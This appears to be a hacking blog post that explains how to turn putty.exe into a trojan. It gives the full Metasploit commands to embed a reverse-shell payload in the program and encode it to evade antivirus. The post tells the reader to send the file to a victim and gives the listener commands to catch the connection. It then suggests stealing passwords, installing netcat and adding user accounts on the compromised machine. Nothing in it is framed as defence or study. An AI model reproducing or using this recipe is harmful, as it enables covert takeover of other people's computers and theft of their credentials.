- I have posted so many articles on windows hacking using metasploit,using trojan etc,
- Today i m go no show u hack windows using putty.
- 1st u must encode putty for bypass antivirus using metasploit and than set payload in putty for connection to victim machine.
- Now you send this encode putty file send to victim when victim open this tool than payload set connection between attacker machine to victim machine and encode is use for bypass antivirus so antivirus is not detect virus in putty.
- You got meterpreter shell in your machine in metasploit so you do anythings in u r victim machine using meterpreter shell
- You install trojan(netcat),u sniffing password (firefox,windows logon etc),u add new user account etc.
You might be interested in some of our other articles:
Man in the middle attack using ssl strip
Social Engineer Toolkit (SET)-Credential Harvester Attack
sslsniff v0.7 – SSL Man-In-The-Middle (MITM) Tool
Hack windows xp (sp1,sp2,sp3) using metasploit
how to crack WPA key. with VIDEO DEMONSTRATION
let's see how to actieve this attack..
Steps:
Login to Backtrack machine
root@bt# cd /opt/framework/msf3/
root@bt:/opt/framework/msf3# mkdir work
copy putty.exe to above created work directory
root@bt:/opt/framework/msf3#mv /root/Desktop/putty.exe work/
root@bt:/opt/framework/msf3# msfpayload windows/shell_reverse_tcp LHOST=<your ip> LPORT=80 R | msfencode -t exe -x work/putty.exe -o /root/Desktop/puttyE.exe -e x86/shikata_ga_nai -k -c 5
wait
It will create puttyE.exe on root user desktop and give this puttyE.exe to victim.
After that start listener:
root@bt# msfconsole
msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp
msf exploit(handler) > set LHOST <your ip>
msf exploit(handler) > set LPORT 80
msf exploit(handler) > exploit
Now go to victim machine and open puttyE.exe
you will get access victim machine from backtrack 5 R1:
- - - - - Video demonstration - - - - -
Related Post :






























